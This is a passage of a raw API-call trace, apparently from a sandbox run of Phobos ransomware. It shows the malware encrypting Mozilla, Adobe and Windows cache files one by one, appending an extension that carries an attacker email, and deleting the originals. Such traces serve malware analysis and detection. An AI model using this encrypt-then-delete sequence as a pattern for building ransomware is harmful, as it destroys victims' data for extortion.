hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.178] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=600000) returned 1 [0195.178] CloseHandle (hObject=0xac) returned 1 [0195.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar")) returned 0x2020 [0195.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.179] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.179] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.180] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0195.180] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.180] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x927c0, lpOverlapped=0x0) returned 1 [0195.277] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x927d0, dwBufLen=0x927d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x927d0) returned 1 [0195.282] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x927d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x927d0, lpOverlapped=0x0) returned 1 [0195.306] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0195.306] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.306] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0195.306] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.306] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0195.306] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.306] CloseHandle (hObject=0xac) returned 1 [0195.306] CloseHandle (hObject=0x12c) returned 1 [0195.306] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar")) returned 1 [0195.311] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.311] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=12) returned 1 [0195.312] CloseHandle (hObject=0x12c) returned 1 [0195.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status")) returned 0x2020 [0195.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.312] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.312] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.419] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0195.419] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.419] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xc, lpOverlapped=0x0) returned 1 [0195.421] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10, dwBufLen=0x10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10) returned 1 [0195.421] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10, lpOverlapped=0x0) returned 1 [0195.422] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0195.422] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.422] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0195.422] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.422] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0195.422] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.422] CloseHandle (hObject=0x12c) returned 1 [0195.422] CloseHandle (hObject=0x124) returned 1 [0195.422] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status")) returned 1 [0195.423] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.424] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=8192) returned 1 [0195.424] CloseHandle (hObject=0x124) returned 1 [0195.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages")) returned 0x2020 [0195.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.424] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.424] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.427] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0195.427] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.427] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2000, lpOverlapped=0x0) returned 1 [0195.428] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2010, dwBufLen=0x2010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2010) returned 1 [0195.428] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2010, lpOverlapped=0x0) returned 1 [0195.429] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0195.429] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.429] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0195.429] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.429] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0195.429] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.429] CloseHandle (hObject=0x124) returned 1 [0195.429] CloseHandle (hObject=0x12c) returned 1 [0195.429] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages")) returned 1 [0195.430] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.431] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=471) returned 1 [0195.431] CloseHandle (hObject=0x12c) returned 1 [0195.431] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b")) returned 0x2024 [0195.431] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.432] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.432] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.432] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0195.432] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.432] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d7, lpOverlapped=0x0) returned 1 [0195.433] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0195.433] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0195.434] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0195.434] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.434] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0195.434] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.434] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0195.434] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.434] CloseHandle (hObject=0x12c) returned 1 [0195.434] CloseHandle (hObject=0x124) returned 1 [0195.435] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b")) returned 1 [0195.435] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.436] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1377) returned 1 [0195.436] CloseHandle (hObject=0x124) returned 1 [0195.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875")) returned 0x2024 [0195.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.436] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.436] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.437] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0195.437] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.437] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x561, lpOverlapped=0x0) returned 1 [0195.449] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x570, dwBufLen=0x570 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x570) returned 1 [0195.449] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x570, lpOverlapped=0x0) returned 1 [0195.450] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, 